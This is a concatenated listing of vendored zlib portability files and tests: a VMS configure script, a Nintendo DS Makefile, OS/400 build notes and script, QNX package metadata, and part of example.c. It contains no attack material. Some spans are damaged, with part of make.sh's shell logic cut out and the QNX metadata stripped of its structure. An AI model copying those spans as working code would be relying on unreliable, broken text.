Check if this is a define relating to the properties of the C/C++ $! compiler $! $ CHECK_CC_DEF: $ if (cdef .eqs. "_LARGEFILE64_SOURCE") $ then $ copy sys$input: 'tc' $ deck #include "tconfig" #define _LARGEFILE #include int main(){ FILE *fp; fp = fopen("temp.txt","r"); fseeko(fp,1,SEEK_SET); fclose(fp); } $ eod $ test_inv = false $ comm_h = false $ gosub cc_prop_check $ return $ endif $ write aconf "/* ", line, " */" $ return $!------------------------------------------------------------------------------ $! $! Check for properties of C/C++ compiler $! $! Version history $! 0.01 20031020 First version to receive a number $! 0.02 20031022 Added logic for defines with value $! 0.03 20040309 Make sure local config file gets not deleted $! 0.04 20041230 Also write include for configure run $! 0.05 20050103 Add processing of "comment defines" $CC_PROP_CHECK: $ cc_prop = true $ is_need = false $ is_need = (f$extract(0,4,cdef) .eqs. "NEED") .or. (test_inv .eq. true) $ if f$search(th) .eqs. "" then create 'th' $ set message/nofac/noident/nosever/notext $ on error then continue $ cc 'tmpnam' $ if .not. ($status) then cc_prop = false $ on error then continue $! The headers might lie about the capabilities of the RTL $ link 'tmpnam',tmp.opt/opt $ if .not. ($status) then cc_prop = false $ set message/fac/ident/sever/text $ on error then goto err_exit $ delete/nolog 'tmpnam'.*;*/exclude='th' $ if (cc_prop .and. .not. is_need) .or. - (.not. cc_prop .and. is_need) $ then $ write sys$output "Checking for ''cdef'... yes" $ if f$type('cdef_val'_yes) .nes. "" $ then $ if f$type('cdef_val'_yes) .eqs. "INTEGER" - then call write_config f$fao("#define !AS !UL",cdef,'cdef_val'_yes) $ if f$type('cdef_val'_yes) .eqs. "STRING" - then call write_config f$fao("#define !AS !AS",cdef,'cdef_val'_yes) $ else $ call write_config f$fao("#define !AS 1",cdef) $ endif $ if (cdef .eqs. "HAVE_FSEEKO") .or. (cdef .eqs. "_LARGE_FILES") .or. - (cdef .eqs. 
"_LARGEFILE64_SOURCE") then - call write_config f$string("#define _LARGEFILE 1") $ else $ write sys$output "Checking for ''cdef'... no" $ if (comm_h) $ then call write_config f$fao("/* !AS */",line) $ else $ if f$type('cdef_val'_no) .nes. "" $ then $ if f$type('cdef_val'_no) .eqs. "INTEGER" - then call write_config f$fao("#define !AS !UL",cdef,'cdef_val'_no) $ if f$type('cdef_val'_no) .eqs. "STRING" - then call write_config f$fao("#define !AS !AS",cdef,'cdef_val'_no) $ else $ call write_config f$fao("#undef !AS",cdef) $ endif $ endif $ endif $ return $!------------------------------------------------------------------------------ $! $! Check for properties of C/C++ compiler with multiple result values $! $! Version history $! 0.01 20040127 First version $! 0.02 20050103 Reconcile changes from cc_prop up to version 0.05 $CC_MPROP_CHECK: $ cc_prop = true $ i = 1 $ idel = 1 $ MT_LOOP: $ if f$type(result_'i') .eqs. "STRING" $ then $ set message/nofac/noident/nosever/notext $ on error then continue $ cc 'tmpnam'_'i' $ if .not. ($status) then cc_prop = false $ on error then continue $! The headers might lie about the capabilities of the RTL $ link 'tmpnam'_'i',tmp.opt/opt $ if .not. ($status) then cc_prop = false $ set message/fac/ident/sever/text $ on error then goto err_exit $ delete/nolog 'tmpnam'_'i'.*;* $ if (cc_prop) $ then $ write sys$output "Checking for ''cdef'... ", mdef_'i' $ if f$type(mdef_'i') .eqs. "INTEGER" - then call write_config f$fao("#define !AS !UL",cdef,mdef_'i') $ if f$type('cdef_val'_yes) .eqs. "STRING" - then call write_config f$fao("#define !AS !AS",cdef,mdef_'i') $ goto msym_clean $ else $ i = i + 1 $ goto mt_loop $ endif $ endif $ write sys$output "Checking for ''cdef'... no" $ call write_config f$fao("#undef !AS",cdef) $ MSYM_CLEAN: $ if (idel .le. msym_max) $ then $ delete/sym mdef_'idel' $ idel = idel + 1 $ goto msym_clean $ endif $ return $!------------------------------------------------------------------------------ $! $! 
Write configuration to both permanent and temporary config file $! $! Version history $! 0.01 20031029 First version to receive a number $! $WRITE_CONFIG: SUBROUTINE $ write aconf 'p1' $ open/append confh 'th' $ write confh 'p1' $ close confh $ENDSUBROUTINE $!------------------------------------------------------------------------------ $! $! Analyze the project map file and create the symbol vector for a shareable $! image from it $! $! Version history $! 0.01 20120128 First version $! 0.02 20120226 Add pre-load logic $! $ MAP_2_SHOPT: Subroutine $! $ SAY := "WRITE_ SYS$OUTPUT" $! $ IF F$SEARCH("''P1'") .EQS. "" $ THEN $ SAY "MAP_2_SHOPT-E-NOSUCHFILE: Error, inputfile ''p1' not available" $ goto exit_m2s $ ENDIF $ IF "''P2'" .EQS. "" $ THEN $ SAY "MAP_2_SHOPT: Error, no output file provided" $ goto exit_m2s $ ENDIF $! $ module1 = "deflate#deflateEnd#deflateInit_#deflateParams#deflateSetDictionary" $ module2 = "gzclose#gzerror#gzgetc#gzgets#gzopen#gzprintf#gzputc#gzputs#gzread" $ module3 = "gzseek#gztell#inflate#inflateEnd#inflateInit_#inflateSetDictionary" $ module4 = "inflateSync#uncompress#zlibVersion#compress" $ open/read map 'p1 $ if axp .or. ia64 $ then $ open/write aopt a.opt $ open/write bopt b.opt $ write aopt " CASE_SENSITIVE=YES" $ write bopt "SYMBOL_VECTOR= (-" $ mod_sym_num = 1 $ MOD_SYM_LOOP: $ if f$type(module'mod_sym_num') .nes. "" $ then $ mod_in = 0 $ MOD_SYM_IN: $ shared_proc = f$element(mod_in, "#", module'mod_sym_num') $ if shared_proc .nes. "#" $ then $ write aopt f$fao(" symbol_vector=(!AS/!AS=PROCEDURE)",- f$edit(shared_proc,"upcase"),shared_proc) $ write bopt f$fao("!AS=PROCEDURE,-",shared_proc) $ mod_in = mod_in + 1 $ goto mod_sym_in $ endif $ mod_sym_num = mod_sym_num + 1 $ goto mod_sym_loop $ endif $MAP_LOOP: $ read/end=map_end map line $ if (f$locate("{",line).lt. f$length(line)) .or. - (f$locate("global:", line) .lt. f$length(line)) $ then $ proc = true $ goto map_loop $ endif $ if f$locate("}",line).lt. 
f$length(line) then proc = false $ if f$locate("local:", line) .lt. f$length(line) then proc = false $ if proc $ then $ shared_proc = f$edit(line,"collapse") $ chop_semi = f$locate(";", shared_proc) $ if chop_semi .lt. f$length(shared_proc) then - shared_proc = f$extract(0, chop_semi, shared_proc) $ write aopt f$fao(" symbol_vector=(!AS/!AS=PROCEDURE)",- f$edit(shared_proc,"upcase"),shared_proc) $ write bopt f$fao("!AS=PROCEDURE,-",shared_proc) $ endif $ goto map_loop $MAP_END: $ close/nolog aopt $ close/nolog bopt $ open/append libopt 'p2' $ open/read aopt a.opt $ open/read bopt b.opt $ALOOP: $ read/end=aloop_end aopt line $ write libopt line $ goto aloop $ALOOP_END: $ close/nolog aopt $ sv = "" $BLOOP: $ read/end=bloop_end bopt svn $ if (svn.nes."") $ then $ if (sv.nes."") then write libopt sv $ sv = svn $ endif $ goto bloop $BLOOP_END: $ write libopt f$extract(0,f$length(sv)-2,sv), "-" $ write libopt ")" $ close/nolog bopt $ delete/nolog/noconf a.opt;*,b.opt;* $ else $ if vax $ then $ open/append libopt 'p2' $ mod_sym_num = 1 $ VMOD_SYM_LOOP: $ if f$type(module'mod_sym_num') .nes. "" $ then $ mod_in = 0 $ VMOD_SYM_IN: $ shared_proc = f$element(mod_in, "#", module'mod_sym_num') $ if shared_proc .nes. "#" $ then $ write libopt f$fao("UNIVERSAL=!AS",- f$edit(shared_proc,"upcase")) $ mod_in = mod_in + 1 $ goto vmod_sym_in $ endif $ mod_sym_num = mod_sym_num + 1 $ goto vmod_sym_loop $ endif $VMAP_LOOP: $ read/end=vmap_end map line $ if (f$locate("{",line).lt. f$length(line)) .or. - (f$locate("global:", line) .lt. f$length(line)) $ then $ proc = true $ goto vmap_loop $ endif $ if f$locate("}",line).lt. f$length(line) then proc = false $ if f$locate("local:", line) .lt. f$length(line) then proc = false $ if proc $ then $ shared_proc = f$edit(line,"collapse") $ chop_semi = f$locate(";", shared_proc) $ if chop_semi .lt. 
f$length(shared_proc) then - shared_proc = f$extract(0, chop_semi, shared_proc) $ write libopt f$fao("UNIVERSAL=!AS",- f$edit(shared_proc,"upcase")) $ endif $ goto vmap_loop $VMAP_END: $ else $ write sys$output "Unknown Architecture (Not VAX, AXP, or IA64)" $ write sys$output "No options file created" $ endif $ endif $ EXIT_M2S: $ close/nolog map $ close/nolog libopt $ endsubroutine ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/nintendods/Makefile ================================================ #--------------------------------------------------------------------------------- .SUFFIXES: #--------------------------------------------------------------------------------- ifeq ($(strip $(DEVKITARM)),) $(error "Please set DEVKITARM in your environment. export DEVKITARM=devkitARM") endif include $(DEVKITARM)/ds_rules #--------------------------------------------------------------------------------- # TARGET is the name of the output # BUILD is the directory where object files & intermediate files will be placed # SOURCES is a list of directories containing source code # DATA is a list of directories containing data files # INCLUDES is a list of directories containing header files #--------------------------------------------------------------------------------- TARGET := $(shell basename $(CURDIR)) BUILD := build SOURCES := ../../ DATA := data INCLUDES := include #--------------------------------------------------------------------------------- # options for code generation #--------------------------------------------------------------------------------- ARCH := -mthumb -mthumb-interwork CFLAGS := -Wall -O2\ -march=armv5te -mtune=arm946e-s \ -fomit-frame-pointer -ffast-math \ $(ARCH) CFLAGS += $(INCLUDE) -DARM9 CXXFLAGS := $(CFLAGS) -fno-rtti -fno-exceptions ASFLAGS := $(ARCH) -march=armv5te -mtune=arm946e-s LDFLAGS = -specs=ds_arm9.specs -g $(ARCH) -Wl,-Map,$(notdir $*.map) 
#--------------------------------------------------------------------------------- # list of directories containing libraries, this must be the top level containing # include and lib #--------------------------------------------------------------------------------- LIBDIRS := $(LIBNDS) #--------------------------------------------------------------------------------- # no real need to edit anything past this point unless you need to add additional # rules for different file extensions #--------------------------------------------------------------------------------- ifneq ($(BUILD),$(notdir $(CURDIR))) #--------------------------------------------------------------------------------- export OUTPUT := $(CURDIR)/lib/libz.a export VPATH := $(foreach dir,$(SOURCES),$(CURDIR)/$(dir)) \ $(foreach dir,$(DATA),$(CURDIR)/$(dir)) export DEPSDIR := $(CURDIR)/$(BUILD) CFILES := $(foreach dir,$(SOURCES),$(notdir $(wildcard $(dir)/*.c))) CPPFILES := $(foreach dir,$(SOURCES),$(notdir $(wildcard $(dir)/*.cpp))) SFILES := $(foreach dir,$(SOURCES),$(notdir $(wildcard $(dir)/*.s))) BINFILES := $(foreach dir,$(DATA),$(notdir $(wildcard $(dir)/*.*))) #--------------------------------------------------------------------------------- # use CXX for linking C++ projects, CC for standard C #--------------------------------------------------------------------------------- ifeq ($(strip $(CPPFILES)),) #--------------------------------------------------------------------------------- export LD := $(CC) #--------------------------------------------------------------------------------- else #--------------------------------------------------------------------------------- export LD := $(CXX) #--------------------------------------------------------------------------------- endif #--------------------------------------------------------------------------------- export OFILES := $(addsuffix .o,$(BINFILES)) \ $(CPPFILES:.cpp=.o) $(CFILES:.c=.o) $(SFILES:.s=.o) export INCLUDE := $(foreach 
dir,$(INCLUDES),-I$(CURDIR)/$(dir)) \ $(foreach dir,$(LIBDIRS),-I$(dir)/include) \ -I$(CURDIR)/$(BUILD) .PHONY: $(BUILD) clean all #--------------------------------------------------------------------------------- all: $(BUILD) @[ -d $@ ] || mkdir -p include @cp ../../*.h include lib: @[ -d $@ ] || mkdir -p $@ $(BUILD): lib @[ -d $@ ] || mkdir -p $@ @$(MAKE) --no-print-directory -C $(BUILD) -f $(CURDIR)/Makefile #--------------------------------------------------------------------------------- clean: @echo clean ... @rm -fr $(BUILD) lib #--------------------------------------------------------------------------------- else DEPENDS := $(OFILES:.o=.d) #--------------------------------------------------------------------------------- # main targets #--------------------------------------------------------------------------------- $(OUTPUT) : $(OFILES) #--------------------------------------------------------------------------------- %.bin.o : %.bin #--------------------------------------------------------------------------------- @echo $(notdir $<) @$(bin2o) -include $(DEPENDS) #--------------------------------------------------------------------------------------- endif #--------------------------------------------------------------------------------------- ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/nintendods/README ================================================ This Makefile requires devkitARM (http://www.devkitpro.org/category/devkitarm/) and works inside "contrib/nds". It is based on a devkitARM template. Eduardo Costa January 3, 2009 ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/os400/README400 ================================================ ZLIB version 1.3.0 for OS/400 installation instructions 1) Download and unpack the zlib tarball to some IFS directory. 
(i.e.: /path/to/the/zlib/ifs/source/directory) If the installed IFS command supports gzip format, this is straightforward, else you have to unpack first to some directory on a system supporting it, then move the whole directory to the IFS via the network (via SMB or FTP). 2) Edit the configuration parameters in the compilation script. EDTF STMF('/path/to/the/zlib/ifs/source/directory/os400/make.sh') Tune the parameters according to your needs if not matching the defaults. Save the file and exit after edition. 3) Enter qshell, then work in the zlib OS/400 specific directory. QSH cd /path/to/the/zlib/ifs/source/directory/os400 4) Compile and install sh make.sh The script will: - create the libraries, objects and IFS directories for the zlib environment, - compile all modules, - create a service program, - create a static and a dynamic binding directory, - install header files for C/C++ and for ILE/RPG, both for compilation in DB2 and IFS environments. That's all. Notes: For OS/400 ILE RPG programmers, a /copy member defining the ZLIB API prototypes for ILE RPG can be found in ZLIB/H(ZLIB.INC). In the ILE environment, the same definitions are available from file zlib.inc located in the same IFS include directory as the C/C++ header files. Please read comments in this member for more information. Remember that most foreign textual data are ASCII coded: this implementation does not handle conversion from/to ASCII, so text data code conversions must be done explicitly. Mainly for the reason above, always open zipped files in binary mode. ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/os400/bndsrc ================================================ STRPGMEXP PGMLVL(*CURRENT) SIGNATURE('ZLIB') /*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@*/ /* Version 1.1.3 entry points. 
*/ /*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@*/ EXPORT SYMBOL("adler32") EXPORT SYMBOL("compress") EXPORT SYMBOL("compress2") EXPORT SYMBOL("crc32") EXPORT SYMBOL("get_crc_table") EXPORT SYMBOL("deflate") EXPORT SYMBOL("deflateEnd") EXPORT SYMBOL("deflateSetDictionary") EXPORT SYMBOL("deflateCopy") EXPORT SYMBOL("deflateReset") EXPORT SYMBOL("deflateParams") EXPORT SYMBOL("deflatePrime") EXPORT SYMBOL("deflateInit_") EXPORT SYMBOL("deflateInit2_") EXPORT SYMBOL("gzopen") EXPORT SYMBOL("gzdopen") EXPORT SYMBOL("gzsetparams") EXPORT SYMBOL("gzread") EXPORT SYMBOL("gzwrite") EXPORT SYMBOL("gzprintf") EXPORT SYMBOL("gzputs") EXPORT SYMBOL("gzgets") EXPORT SYMBOL("gzputc") EXPORT SYMBOL("gzgetc") EXPORT SYMBOL("gzflush") EXPORT SYMBOL("gzseek") EXPORT SYMBOL("gzrewind") EXPORT SYMBOL("gztell") EXPORT SYMBOL("gzeof") EXPORT SYMBOL("gzclose") EXPORT SYMBOL("gzerror") EXPORT SYMBOL("inflate") EXPORT SYMBOL("inflateEnd") EXPORT SYMBOL("inflateSetDictionary") EXPORT SYMBOL("inflateSync") EXPORT SYMBOL("inflateReset") EXPORT SYMBOL("inflateInit_") EXPORT SYMBOL("inflateInit2_") EXPORT SYMBOL("inflateSyncPoint") EXPORT SYMBOL("uncompress") EXPORT SYMBOL("zlibVersion") EXPORT SYMBOL("zError") EXPORT SYMBOL("z_errmsg") /*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@*/ /* Version 1.2.1 additional entry points. */ /*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@*/ EXPORT SYMBOL("compressBound") EXPORT SYMBOL("deflateBound") EXPORT SYMBOL("deflatePending") EXPORT SYMBOL("gzungetc") EXPORT SYMBOL("gzclearerr") EXPORT SYMBOL("inflateBack") EXPORT SYMBOL("inflateBackEnd") EXPORT SYMBOL("inflateBackInit_") EXPORT SYMBOL("inflateCopy") EXPORT SYMBOL("zlibCompileFlags") /*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@*/ /* Version 1.2.4 additional entry points. 
*/ /*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@*/ EXPORT SYMBOL("adler32_combine") EXPORT SYMBOL("adler32_combine64") EXPORT SYMBOL("crc32_combine") EXPORT SYMBOL("crc32_combine64") EXPORT SYMBOL("deflateSetHeader") EXPORT SYMBOL("deflateTune") EXPORT SYMBOL("gzbuffer") EXPORT SYMBOL("gzclose_r") EXPORT SYMBOL("gzclose_w") EXPORT SYMBOL("gzdirect") EXPORT SYMBOL("gzoffset") EXPORT SYMBOL("gzoffset64") EXPORT SYMBOL("gzopen64") EXPORT SYMBOL("gzseek64") EXPORT SYMBOL("gztell64") EXPORT SYMBOL("inflateGetHeader") EXPORT SYMBOL("inflateMark") EXPORT SYMBOL("inflatePrime") EXPORT SYMBOL("inflateReset2") EXPORT SYMBOL("inflateUndermine") /*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@*/ /* Version 1.2.6 additional entry points. */ /*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@*/ EXPORT SYMBOL("deflateResetKeep") EXPORT SYMBOL("gzgetc_") EXPORT SYMBOL("inflateResetKeep") /*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@*/ /* Version 1.2.8 additional entry points. */ /*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@*/ EXPORT SYMBOL("gzvprintf") EXPORT SYMBOL("inflateGetDictionary") /*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@*/ /* Version 1.2.9 additional entry points. */ /*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@*/ EXPORT SYMBOL("adler32_z") EXPORT SYMBOL("crc32_z") EXPORT SYMBOL("deflateGetDictionary") EXPORT SYMBOL("gzfread") EXPORT SYMBOL("gzfwrite") EXPORT SYMBOL("inflateCodesUsed") EXPORT SYMBOL("inflateValidate") EXPORT SYMBOL("uncompress2") /*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@*/ /* Version 1.2.12 additional entry points. 
*/ /*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@*/ EXPORT SYMBOL("crc32_combine_gen64") EXPORT SYMBOL("crc32_combine_gen") EXPORT SYMBOL("crc32_combine_op") ENDPGMEXP ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/os400/make.sh ================================================ #!/bin/sh # # ZLIB compilation script for the OS/400. # # # This is a shell script since make is not a standard component of OS/400. ################################################################################ # # Tunable configuration parameters. # ################################################################################ TARGETLIB='ZLIB' # Target OS/400 program library STATBNDDIR='ZLIB_A' # Static binding directory. DYNBNDDIR='ZLIB' # Dynamic binding directory. SRVPGM="ZLIB" # Service program. IFSDIR='/zlib' # IFS support base directory. TGTCCSID='500' # Target CCSID of objects DEBUG='*NONE' # Debug level OPTIMIZE='40' # Optimisation level OUTPUT='*NONE' # Compilation output option. TGTRLS='V6R1M0' # Target OS release export TARGETLIB STATBNDDIR DYNBNDDIR SRVPGM IFSDIR export TGTCCSID DEBUG OPTIMIZE OUTPUT TGTRLS ################################################################################ # # OS/400 specific definitions. # ################################################################################ LIBIFSNAME="/QSYS.LIB/${TARGETLIB}.LIB" ################################################################################ # # Procedures. # ################################################################################ # action_needed dest [src] # # dest is an object to build # if specified, src is an object on which dest depends. # # exit 0 (succeeds) if some action has to be taken, else 1. action_needed() { [ ! 
-e "${1}" ] && return 0 [ "${2}" ] || return 1 [ "${1}" -ot "${2}" ] && return 0 return 1 } # make_module module_name source_name [additional_definitions] # # Compile source name into module if needed. # As side effect, append the module name to variable MODULES. # Set LINK to "YES" if the module has been compiled. make_module() { MODULES="${MODULES} ${1}" MODIFSNAME="${LIBIFSNAME}/${1}.MODULE" CSRC="`basename \"${2}\"`" if action_needed "${MODIFSNAME}" "${2}" then : elif [ ! "`sed -e \"//,/<\\\\/source>/!d\" \ -e '/ tmphdrfile # Need to translate to target CCSID. CMD="CPY OBJ('`pwd`/tmphdrfile') TOOBJ('${DEST}')" CMD="${CMD} TOCCSID(${TGTCCSID}) DTAFMT(*TEXT) REPLACE(*YES)" system "${CMD}" # touch -r "${HFILE}" "${DEST}" rm -f tmphdrfile fi IFSFILE="${IFSDIR}/include/`basename \"${HFILE}\"`" if action_needed "${IFSFILE}" "${DEST}" then rm -f "${IFSFILE}" ln -s "${DEST}" "${IFSFILE}" fi done # Install the ILE/RPG header file. HFILE="${SCRIPTDIR}/zlib.inc" DEST="${SRCPF}/ZLIB.INC.MBR" if action_needed "${DEST}" "${HFILE}" then CMD="CPY OBJ('${HFILE}') TOOBJ('${DEST}')" CMD="${CMD} TOCCSID(${TGTCCSID}) DTAFMT(*TEXT) REPLACE(*YES)" system "${CMD}" # touch -r "${HFILE}" "${DEST}" fi IFSFILE="${IFSDIR}/include/`basename \"${HFILE}\"`" if action_needed "${IFSFILE}" "${DEST}" then rm -f "${IFSFILE}" ln -s "${DEST}" "${IFSFILE}" fi # Create and compile the identification source file. echo '#pragma comment(user, "ZLIB version '"${VERSION}"'")' > os400.c echo '#pragma comment(user, __DATE__)' >> os400.c echo '#pragma comment(user, __TIME__)' >> os400.c echo '#pragma comment(copyright, "Copyright (C) 1995-2017 Jean-Loup Gailly, Mark Adler. OS/400 version by P. Monnerat.")' >> os400.c make_module OS400 os400.c LINK= # No need to rebuild service program yet. MODULES= # Get source list. 
CSOURCES=`sed -e '/ Library Medium 2.0 zlib zlib alain.bonnefoy@icbt.com Public public www.gzip.org/zlib Jean-Loup Gailly,Mark Adler www.gzip.org/zlib zlib@gzip.org A massively spiffy yet delicately unobtrusive compression library. zlib is designed to be a free, general-purpose, legally unencumbered, lossless data compression library for use on virtually any computer hardware and operating system. http://www.gzip.org/zlib 1.3.0 Medium Stable No License Software Development/Libraries and Extensions/C Libraries zlib,compression qnx6 qnx6 None Developer Install Post No Ignore No Optional InstallOver zlib InstallOver zlib-dev ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/test/example.c ================================================ /* example.c -- usage example of the zlib compression library * Copyright (C) 1995-2006, 2011, 2016 Jean-loup Gailly * For conditions of distribution and use, see copyright notice in zlib.h */ /* @(#) $Id$ */ #include "zlib.h" #include #ifdef STDC # include # include #endif #if defined(VMS) || defined(RISCOS) # define TESTFILE "foo-gz" #else # define TESTFILE "foo.gz" #endif #define CHECK_ERR(err, msg) { \ if (err != Z_OK) { \ fprintf(stderr, "%s error: %d\n", msg, err); \ exit(1); \ } \ } static z_const char hello[] = "hello, hello!"; /* "hello world" would be more standard, but the repeated "hello" * stresses the compression code better, sorry... 
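*/

static const char dictionary[] = "hello";
static uLong dictId;    /* Adler32 value of the dictionary */

#ifdef Z_SOLO

/* Allocator handed to zlib when built with Z_SOLO: the opaque pointer q is
 * ignored and the request is served by calloc(n, m). */
void *myalloc(void *q, unsigned n, unsigned m) {
    (void)q;
    return calloc(n, m);
}

/* Release routine paired with myalloc(); q is ignored. */
void myfree(void *q, void *p) {
    (void)q;
    free(p);
}

static alloc_func zalloc = myalloc;
static free_func zfree = myfree;

#else /* !Z_SOLO */

/* Null allocator hooks: every z_stream below is initialized with these. */
static alloc_func zalloc = (alloc_func)0;
static free_func zfree = (free_func)0;

/* ===========================================================================
 * Test compress() and uncompress()
 *
 * Compresses hello (with its terminating NUL) into compr, expands it again
 * into uncompr and exits with status 1 unless the round trip reproduces
 * hello. comprLen and uncomprLen are the capacities of the two buffers;
 * uncompr must be able to hold the 8-byte "garbage" marker written first.
 */
void test_compress(Byte *compr, uLong comprLen, Byte *uncompr,
                   uLong uncomprLen) {
    int err;
    uLong len = (uLong)strlen(hello)+1;

    err = compress(compr, &comprLen, (const Bytef*)hello, len);
    CHECK_ERR(err, "compress");

    /* poison the output so a no-op uncompress() cannot pass the comparison */
    strcpy((char*)uncompr, "garbage");

    err = uncompress(uncompr, &uncomprLen, compr, comprLen);
    CHECK_ERR(err, "uncompress");

    if (strcmp((char*)uncompr, hello)) {
        fprintf(stderr, "bad uncompress\n");
        exit(1);
    } else {
        printf("uncompress(): %s\n", (char *)uncompr);
    }
}

/* ===========================================================================
 * Test read/write of .gz files
 *
 * Writes hello plus one zero byte to fname through the gz* API, reopens the
 * file and checks gzread(), gzseek(), gztell(), gzgetc(), gzungetc() and
 * gzgets() against the known content. Any mismatch exits with status 1.
 * fname is created or overwritten; main() passes argv[1] when one is given.
 * With NO_GZCOMPRESS defined only a diagnostic is printed.
 */
void test_gzio(const char *fname, Byte *uncompr, uLong uncomprLen) {
#ifdef NO_GZCOMPRESS
    fprintf(stderr, "NO_GZCOMPRESS -- gz* functions cannot compress\n");
#else
    int err;
    int len = (int)strlen(hello)+1;
    gzFile file;
    z_off_t pos;

    file = gzopen(fname, "wb");
    if (file == NULL) {
        fprintf(stderr, "gzopen error\n");
        exit(1);
    }
    gzputc(file, 'h');
    if (gzputs(file, "ello") != 4) {
        fprintf(stderr, "gzputs err: %s\n", gzerror(file, &err));
        exit(1);
    }
    if (gzprintf(file, ", %s!", "hello") != 8) {
        fprintf(stderr, "gzprintf err: %s\n", gzerror(file, &err));
        exit(1);
    }
    gzseek(file, 1L, SEEK_CUR); /* add one zero byte */
    /* NOTE(review): the gzclose() result is not checked here, so a failed
     * final write would only show up as a read mismatch below. */
    gzclose(file);

    file = gzopen(fname, "rb");
    if (file == NULL) {
        fprintf(stderr, "gzopen error\n");
        exit(1);
    }
    strcpy((char*)uncompr, "garbage");

    if (gzread(file, uncompr, (unsigned)uncomprLen) != len) {
        fprintf(stderr, "gzread err: %s\n", gzerror(file, &err));
        exit(1);
    }
    if (strcmp((char*)uncompr, hello)) {
        fprintf(stderr, "bad gzread: %s\n", (char*)uncompr);
        exit(1);
    } else {
        printf("gzread(): %s\n", (char*)uncompr);
    }

    /* step back 8 bytes from the end of the data just read */
    pos = gzseek(file, -8L, SEEK_CUR);
    if (pos != 6 || gztell(file) != pos) {
        fprintf(stderr, "gzseek error, pos=%ld, gztell=%ld\n",
                (long)pos, (long)gztell(file));
        exit(1);
    }

    if (gzgetc(file) != ' ') {
        fprintf(stderr, "gzgetc error\n");
        exit(1);
    }

    if (gzungetc(' ', file) != ' ') {
        fprintf(stderr, "gzungetc error\n");
        exit(1);
    }

    /* the gzgets() result is not inspected; a failed read leaves the earlier
     * content in uncompr, which the length check below rejects */
    gzgets(file, (char*)uncompr, (int)uncomprLen);
    if (strlen((char*)uncompr) != 7) { /* " hello!" */
        fprintf(stderr, "gzgets err after gzseek: %s\n", gzerror(file, &err));
        exit(1);
    }
    if (strcmp((char*)uncompr, hello + 6)) {
        fprintf(stderr, "bad gzgets after gzseek\n");
        exit(1);
    } else {
        printf("gzgets() after gzseek: %s\n", (char*)uncompr);
    }

    gzclose(file);
#endif
}

#endif /* Z_SOLO */

/* ===========================================================================
 * Test deflate() with small buffers
 *
 * Compresses hello into compr one input byte and one output byte per call.
 * comprLen is the capacity of compr; the stream is never allowed to write
 * past it. Exits with status 1 on any zlib error.
 */
void test_deflate(Byte *compr, uLong comprLen) {
    z_stream c_stream; /* compression stream */
    int err;
    uLong len = (uLong)strlen(hello)+1;

    c_stream.zalloc = zalloc;
    c_stream.zfree = zfree;
    c_stream.opaque = (voidpf)0;

    err = deflateInit(&c_stream, Z_DEFAULT_COMPRESSION);
    CHECK_ERR(err, "deflateInit");

    c_stream.next_in  = (z_const unsigned char *)hello;
    c_stream.next_out = compr;

    while (c_stream.total_in != len && c_stream.total_out < comprLen) {
        c_stream.avail_in = c_stream.avail_out = 1; /* force small buffers */
        err = deflate(&c_stream, Z_NO_FLUSH);
        CHECK_ERR(err, "deflate");
    }
    /* Finish the stream, still forcing small buffers: */
    for (;;) {
        /* The loop above stops at comprLen, but this one hands deflate() a
         * fresh output byte on every pass; without this bound a short compr
         * buffer would be overrun. A buffer with no free byte left is
         * treated as too small. */
        if (c_stream.total_out >= comprLen) {
            fprintf(stderr, "deflate: output buffer too small\n");
            exit(1);
        }
        c_stream.avail_out = 1;
        err = deflate(&c_stream, Z_FINISH);
        if (err == Z_STREAM_END) break;
        CHECK_ERR(err, "deflate");
    }

    err = deflateEnd(&c_stream);
    CHECK_ERR(err, "deflateEnd");
}

/* ===========================================================================
 * Test inflate() with small buffers
 *
 * Expands compr into uncompr one byte at a time, bounded by comprLen input
 * bytes and uncomprLen output bytes, and exits with status 1 unless the
 * result equals hello.
 */
void test_inflate(Byte *compr, uLong comprLen, Byte *uncompr,
                  uLong uncomprLen) {
    int err;
    z_stream d_stream; /* decompression stream */

    strcpy((char*)uncompr, "garbage");

    d_stream.zalloc = zalloc;
    d_stream.zfree = zfree;
    d_stream.opaque = (voidpf)0;

    d_stream.next_in  = compr;
    d_stream.avail_in = 0;
    d_stream.next_out = uncompr;

    err = inflateInit(&d_stream);
    CHECK_ERR(err, "inflateInit");

    while (d_stream.total_out < uncomprLen && d_stream.total_in < comprLen) {
        d_stream.avail_in = d_stream.avail_out = 1; /* force small buffers */
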